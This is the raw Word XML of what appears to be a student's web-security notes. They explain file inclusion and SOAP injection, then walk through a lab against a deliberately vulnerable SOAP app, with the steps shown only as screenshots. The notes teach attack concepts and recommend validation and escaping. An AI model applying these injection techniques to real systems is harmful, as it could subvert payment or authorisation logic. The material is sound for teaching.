        <w:t>Dynamic execution vulnerabilities are found by sending test commands as input and checking whether the website executes them instead of treating them as normal data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B840964" w14:textId="77777777" w:rsidR="005C606A" w:rsidRDefault="005C606A" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CAB5CA" w14:textId="2474AB75" w:rsidR="00155571" w:rsidRPr="00EC09FC" w:rsidRDefault="00155571" w:rsidP="00155571">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155571">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>File Inclusion Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC09FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAEF504" w14:textId="77777777" w:rsidR="0058682F" w:rsidRPr="0058682F" w:rsidRDefault="0058682F" w:rsidP="0058682F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0058682F">
        <w:t>Websites use include files to reuse code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA6B4E" w14:textId="77777777" w:rsidR="0058682F" w:rsidRPr="0058682F" w:rsidRDefault="0058682F" w:rsidP="0058682F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0058682F">
        <w:t>If users can choose the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F34270" w14:textId="77777777" w:rsidR="0058682F" w:rsidRPr="0058682F" w:rsidRDefault="0058682F" w:rsidP="00DC28F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0058682F">
        <w:t>They can include bad files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094897E2" w14:textId="77777777" w:rsidR="0058682F" w:rsidRPr="0058682F" w:rsidRDefault="0058682F" w:rsidP="0058682F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0058682F">
        <w:t>Remote inclusion = attacker’s file from another server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F780BC" w14:textId="77777777" w:rsidR="0058682F" w:rsidRPr="0058682F" w:rsidRDefault="0058682F" w:rsidP="0058682F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0058682F">
        <w:t>Local inclusion = sensitive files already on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721278A5" w14:textId="77777777" w:rsidR="0058682F" w:rsidRDefault="0058682F" w:rsidP="0058682F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0058682F">
        <w:t>Both are dangerous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A81F6" w14:textId="28611208" w:rsidR="003F702D" w:rsidRDefault="003F702D" w:rsidP="0058682F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003F702D">
        <w:t>File inclusion vulnerabilities happen when a website lets user input decide which file is included, allowing attackers to run malicious code or access protected files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A56DB22" w14:textId="77777777" w:rsidR="0058682F" w:rsidRPr="0058682F" w:rsidRDefault="0058682F" w:rsidP="0058682F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="340DEB17" w14:textId="0BE0114D" w:rsidR="00443054" w:rsidRPr="00A56427" w:rsidRDefault="00443054" w:rsidP="00443054">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443054">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injecting into SOAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A1B13" w14:textId="77777777" w:rsidR="00D43568" w:rsidRPr="00D43568" w:rsidRDefault="00D43568" w:rsidP="00D43568">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43568">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is SOAP, in plain terms?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0D53F5" w14:textId="77777777" w:rsidR="00D43568" w:rsidRPr="00D43568" w:rsidRDefault="00D43568" w:rsidP="00D43568">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D43568">
        <w:t>SOAP (Simple Object Access Protocol) is a way for different computer systems to talk to each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565AD6B6" w14:textId="77777777" w:rsidR="00D43568" w:rsidRPr="00D43568" w:rsidRDefault="00D43568" w:rsidP="00D43568">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D43568">
        <w:t>It sends messages in XML format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EBF5EE" w14:textId="77777777" w:rsidR="00D43568" w:rsidRPr="00D43568" w:rsidRDefault="00D43568" w:rsidP="00D43568">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D43568">
        <w:t>It’s commonly used behind the scenes, not directly in your browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7846A84A" w14:textId="77777777" w:rsidR="00D43568" w:rsidRPr="00D43568" w:rsidRDefault="00D43568" w:rsidP="00D43568">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D43568">
        <w:t>Different parts of a big application (often on different servers) use SOAP to exchange data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D47EAA2" w14:textId="2B3FD21B" w:rsidR="00FF1052" w:rsidRDefault="00FF1052" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5033DF0F" w14:textId="77777777" w:rsidR="003F554B" w:rsidRPr="003F554B" w:rsidRDefault="003F554B" w:rsidP="003F554B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F554B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why is SOAP used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710130E4" w14:textId="77777777" w:rsidR="003F554B" w:rsidRPr="003F554B" w:rsidRDefault="003F554B" w:rsidP="003F554B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003F554B">
        <w:t>SOAP is popular in large enterprise systems because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD90FD" w14:textId="77777777" w:rsidR="003F554B" w:rsidRPr="003F554B" w:rsidRDefault="003F554B" w:rsidP="003F554B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003F554B">
        <w:t>Different tasks are handled by different computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647024FB" w14:textId="77777777" w:rsidR="003F554B" w:rsidRPr="003F554B" w:rsidRDefault="003F554B" w:rsidP="003F554B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003F554B">
        <w:t>It works across different operating systems and programming languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D47A0AD" w14:textId="77777777" w:rsidR="003F554B" w:rsidRPr="003F554B" w:rsidRDefault="003F554B" w:rsidP="003F554B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003F554B">
        <w:t>It helps keep systems modular and interoperable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693DE2C2" w14:textId="77777777" w:rsidR="00980698" w:rsidRPr="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why does XML matter here?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06312C4F" w14:textId="77777777" w:rsidR="00980698" w:rsidRPr="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:t>SOAP messages are written in XML, which uses special characters like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D8188" w14:textId="77777777" w:rsidR="00980698" w:rsidRPr="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:t>&lt;tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF060A" w14:textId="77777777" w:rsidR="00980698" w:rsidRPr="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:t>&lt;/tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF779FC" w14:textId="77777777" w:rsidR="00980698" w:rsidRPr="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:t>XML is interpreted, meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F95E9" w14:textId="77777777" w:rsidR="00980698" w:rsidRPr="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:t xml:space="preserve">The computer </w:t>
      </w:r>
      <w:r w:rsidRPr="00980698">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reads and understands</w:t>
      </w:r>
      <w:r w:rsidRPr="00980698">
        <w:t xml:space="preserve"> its structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6CB8F" w14:textId="77777777" w:rsidR="00980698" w:rsidRPr="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:t>If the structure changes, the meaning changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC0477" w14:textId="245C3C58" w:rsidR="00980698" w:rsidRDefault="00980698" w:rsidP="00980698">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00980698">
        <w:t>If user input is inserted into XML without proper checking, a user might accidentally or deliberately change the structure of the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D4064F" w14:textId="77777777" w:rsidR="004B4F41" w:rsidRPr="004B4F41" w:rsidRDefault="004B4F41" w:rsidP="004B4F41">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where the problem starts (injection risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0802E30A" w14:textId="77777777" w:rsidR="004B4F41" w:rsidRPr="004B4F41" w:rsidRDefault="004B4F41" w:rsidP="004B4F41">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4F41">
        <w:t>The application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC9E0B" w14:textId="77777777" w:rsidR="004B4F41" w:rsidRPr="004B4F41" w:rsidRDefault="004B4F41" w:rsidP="004B4F41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4F41">
        <w:t>Takes user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D7FAAA" w14:textId="77777777" w:rsidR="004B4F41" w:rsidRPr="004B4F41" w:rsidRDefault="004B4F41" w:rsidP="004B4F41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4F41">
        <w:t>Inserts it directly into the SOAP XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662ADD5F" w14:textId="1B854B4F" w:rsidR="004B4F41" w:rsidRPr="004B4F41" w:rsidRDefault="004B4F41" w:rsidP="004B4F41">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4F41">
        <w:t>If the user input contains XML characters like &lt; or &gt;, the SOAP message structure can be altered. This is called SOAP Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1312D768" w14:textId="259CD682" w:rsidR="004B4F41" w:rsidRDefault="00F35744" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Basically,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773EF76" w14:textId="4E526C25" w:rsidR="00F35744" w:rsidRPr="00F35744" w:rsidRDefault="00F35744" w:rsidP="00F35744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F35744">
        <w:t>SOAP is a way for backend systems to communicate using XML messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B66021" w14:textId="1992ED94" w:rsidR="00F35744" w:rsidRPr="00F35744" w:rsidRDefault="00F35744" w:rsidP="00F35744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F35744">
        <w:t>XML is sensitive to special characters, so poorly handled user input can change message structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009298CD" w14:textId="6652F9AA" w:rsidR="00F35744" w:rsidRPr="00F35744" w:rsidRDefault="00F35744" w:rsidP="00F35744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F35744">
        <w:t>If user input is inserted directly into SOAP messages, attackers may alter application logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC968A" w14:textId="405F5A9D" w:rsidR="00F35744" w:rsidRPr="00F35744" w:rsidRDefault="00F35744" w:rsidP="00F35744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F35744">
        <w:t>In the example, an attacker tries to change a “not enough funds” decision to “approved.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F27EA19" w14:textId="3F8B4A54" w:rsidR="00F35744" w:rsidRPr="00F35744" w:rsidRDefault="00F35744" w:rsidP="00F35744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F35744">
        <w:t>Proper input validation and XML escaping are essential to prevent SOAP injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F87C68" w14:textId="77777777" w:rsidR="00F35744" w:rsidRDefault="00F35744" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F802BE" w14:textId="77777777" w:rsidR="00392E85" w:rsidRDefault="00392E85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="463DD42C" w14:textId="6C12B008" w:rsidR="00D42239" w:rsidRPr="00EC09FC" w:rsidRDefault="00D42239" w:rsidP="00D42239">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Observing SOAP behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC09FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D872FB3" w14:textId="0CE2CDE3" w:rsidR="00D42239" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Vuln_soap_app.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82D66D" w14:textId="1773BCAF" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1A3D9F" wp14:editId="41BC4355">
            <wp:extent cx="5731510" cy="4109720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="93473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5711" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4109720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE12C8" w14:textId="6274349C" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F1340D5" wp14:editId="337ADB2D">
            <wp:extent cx="5731510" cy="2239010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="90798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89543" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2239010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7F8F6" w14:textId="77777777" w:rsidR="00392E85" w:rsidRDefault="00392E85">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A101A56" w14:textId="7C8DF2C9" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step1: (Goal: Baseline result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6977B920" w14:textId="54C7F250" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A7D150" wp14:editId="4ED34B51">
            <wp:extent cx="5731510" cy="1607820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4262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3774" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1607820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB5F19B" w14:textId="5DDB7731" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Step2: (Goal: To make the testing easier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214DF70" w14:textId="2966111D" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BAB4B4B" wp14:editId="2D3FB5F4">
            <wp:extent cx="5731510" cy="2687955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="90584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2592" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2687955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0498E3" w14:textId="3C9EA3DC" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step3: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="009205C6">
        <w:t>Rogue XML closing tag test</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAE9E8B" w14:textId="2881A63F" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D39608" wp14:editId="2F738892">
            <wp:extent cx="5731510" cy="356870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="101985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7769" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="356870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E892D" w14:textId="6CCD170D" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t>Amount is directly inserted into the SOAP XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C6EFB" w14:textId="13F1498E" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step4: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470034F4" w14:textId="19330E7E" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56BFBEBB" wp14:editId="1BEC72EF">
            <wp:extent cx="5731510" cy="214630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11836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628" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="214630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D99AA" w14:textId="6A7BD816" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
